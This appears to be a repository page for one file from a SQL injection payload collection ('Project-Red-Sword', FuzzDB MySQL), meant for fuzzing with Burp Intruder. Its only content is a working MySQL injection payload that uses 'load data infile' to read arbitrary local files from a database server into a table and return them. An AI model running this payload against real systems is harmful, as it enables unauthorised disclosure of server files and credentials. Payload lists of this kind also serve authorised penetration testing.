Project-Red-Sword / payloads /SQL Injection /Intruder /FUZZDB_MySQL_ReadLocalFiles.txt
dia-gov's picture
Upload 433 files
5f491f6 verified
raw
history blame contribute delete
210 Bytes
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;